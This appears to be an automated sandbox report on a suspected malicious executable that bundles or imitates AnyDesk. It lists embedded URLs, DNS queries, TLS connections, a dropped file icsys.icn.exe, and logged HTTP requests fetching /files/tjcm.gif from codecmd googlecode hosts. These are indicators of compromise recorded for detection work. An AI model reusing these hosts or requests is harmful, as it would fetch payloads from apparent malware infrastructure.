                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: svchost.exe, 0000000A.00000002.715359302.0000018397E63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                                Source: sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                                Source: sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://support.anydesk.com
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.anydesk.com/
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.opengl.org/registry/
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/)
                                Source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                                Source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvalue
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/company#imprint
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/order
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/order2
                                Source: sj9q8uwmax.exe , 00000001.00000003.458587076.000000000359C000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458652270.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458843771.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458065682.000000000358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/pa/
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/privacy
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/terms
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/terms~l
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://anydesk.com/update
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk.com/updater~
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://boot-01.net.anydesk.com
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalid
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://console-ui.myanydesk2.on.anydesk.com
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: sJ9Q8UWMAX.exe, 00000000.00000003.463012507.000000000062C000.00000004.00000020.00020000.00000000.sdmp, sJ9Q8UWMAX.exe, 00000000.00000003.462922321.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/6k
                                Source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/HelpLinkInstallLocationAnyDesk
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/access
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/backup-alias
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/backup-aliasn
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/en
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/en/android-battery
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/error-messages
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/macos-security
                                Source: sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/macos-securitys.
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/nnl
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/share
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/shareW
                                Source: sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.anydesk.com/shareh
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://help.anydesk.com/wol
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://my.anydesk.com
                                Source: sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://my.anydesk.com/password-generator.
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.anydesk.coms
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://order.anydesk.com/trial
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=en
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=en$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/privacy?hl=enf
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.anydesk.com/
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/.
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://support.anydesk.com/AnyDesk_on_macOS
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.anydesk.com/f
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://twitter.com/home?status=Do%20you%20know%20%23AnyDesk?%20AnyDesk%20is%20a%20small%20and%20qui
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.google.com/intl/$
                                Source: sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en
                                Source: sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Rem
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.nayuki.io/page/qr-code-generator-library
                                Source: unknownDNS traffic detected: queries for: boot.net.anydesk.com
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                Source: unknownHTTPS traffic detected: 185.229.191.39:443 -> 192.168.2.5:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49807 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.236:443 -> 192.168.2.5:49856 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 49.12.130.237:443 -> 192.168.2.5:49889 version: TLS 1.2
                                Source: sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DirectDrawCreateEx

                                System Summary

                                Source: sJ9Q8UWMAX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
